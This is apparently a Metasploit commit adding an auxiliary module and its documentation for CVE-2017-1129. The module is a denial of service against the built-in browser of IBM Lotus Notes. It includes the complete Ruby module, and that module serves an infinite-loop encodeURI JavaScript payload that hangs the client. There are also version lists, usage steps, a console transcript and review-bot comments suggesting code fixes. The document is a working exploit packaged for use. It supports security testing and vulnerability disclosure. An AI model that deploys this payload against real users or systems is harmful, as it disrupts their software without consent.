Land #8989, IBM Lotus Notes DoS (CVE-2017-1129)

Pearce Barry 2017-10-09 19:37:59 -05:00
commit a3d47ea838
No known key found for this signature in database
GPG Key ID: 0916F4DEA5C5DE0A
2 changed files with 122 additions and 0 deletions


@ -0,0 +1,63 @@
## Vulnerable Application
This module exploits a vulnerability in the built-in web-browser of IBM Lotus Notes client application.
JavaScript is used to create an object instance of encode URI within an infinite loop,
leading to a Denial of Service of the IBM Lotus Notes app itself.
Vulnerable app versions include:
* IBM Notes 9.0.1 to 9.0.1 FP8IF1
* IBM Notes 9.0 to 9.0 IF4.
* IBM Notes 8.5.3 to 8.5.3 FP6 IF13.
* IBM Notes 8.5.2 to 8.5.2 FP4 IF3.
* IBM Notes 8.5.1. to 8.5.1 FP5 IF5.
* IBM Notes 8.5 release
Related security bulletin from IBM: http://www-01.ibm.com/support/docview.wss?uid=swg21999385
## Verification
1. Start msfconsole
1. `use auxiliary/dos/http/ibm_lotus_notes.rb`
1. Set `SRVHOST`
1. Set `SRVPORT`
1. run (Server started)
1. Visit server URL in the built-in web-browser of IBM Notes client application
## Scenarios
```
msf > use auxiliary/dos/http/ibm_lotus_notes
msf auxiliary(ibm_lotus_notes) > show options
Module options (auxiliary/dos/http/ibm_lotus_notes):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Auxiliary action:
Name Description
---- -----------
WebServer
msf auxiliary(ibm_lotus_notes) > set SRVHOST 192.168.0.50
SRVHOST => 192.168.0.50
msf auxiliary(ibm_lotus_notes) > set SRVPORT 9092
SRVPORT => 9092
msf auxiliary(ibm_lotus_notes) > run
[*] Auxiliary module execution completed
msf auxiliary(ibm_lotus_notes) >
[*] Using URL: http://192.168.0.50:9092/ImlbHZVXlvTEXYd
[*] Server started.
msf auxiliary(ibm_lotus_notes) >
```
At this point, the target should use the built-in web browser of their IBM Lotus Notes client to navigate to the above "Using URL" value. And then they should see their Notes app become unresponsive.
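
Review bot: In the Verification steps, `use auxiliary/dos/http/ibm_lotus_notes.rb` carries a `.rb` suffix that the Scenarios transcript does not (`use auxiliary/dos/http/ibm_lotus_notes`); drop the suffix so both show the same module path. In the version list, "8.5.1." has a stray period and the bullets end inconsistently, some with a full stop and some without. The Scenarios output prints "Auxiliary module execution completed" before "Server started.", so one sentence noting that the server keeps running after the prompt returns would stop readers from assuming the run has ended.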


@ -0,0 +1,59 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(
update_info(
info,
'Name' => "IBM Notes encodeURI DOS",
'Description' => %q(
This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.
If successful, it could cause the Notes client to hang and have to be restarted.
),
'License' => MSF_LICENSE,
'Author' => [
'Dhiraj Mishra',
],
'References' => [
[ 'EXPLOIT-DB', '42602'],
[ 'CVE', '2017-1129' ],
[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21999385' ]
],
'DisclosureDate' => 'Aug 31 2017',
'Actions' => [[ 'WebServer' ]],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer'
)
)
end
def run
exploit # start http server
end
def setup
@html = %|
<html><head><title>DOS</title>
<script type="text/javascript">
while (true) try {
var object = { };
function d(d0) {
var d0 = (object instanceof encodeURI)('foo');
}
d(75);
} catch (d) { }
</script>
</head></html>
|
end
def on_request_uri(cli, _request)
print_status('Sending response')
send_response(cli, @html)
end
end
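
Review bot: `setup` assigns `@html` but never calls `super`, and the class includes `Msf::Exploit::Remote::HttpServer`, so any setup defined by the mixin or the parent class would be skipped; add `super` as the first line of `setup` unless skipping it is deliberate. In the embedded script, `d(75)` passes an argument that `function d(d0)` immediately shadows with `var d0`, so either drop the parameter and the 75 or add a comment saying why they are there. `print_status('Sending response')` in `on_request_uri` does not say which client was served; including the peer address from `cli` would make the console output usable as a record of who loaded the page. 'Name' spells "DOS" where the commit title uses "DoS".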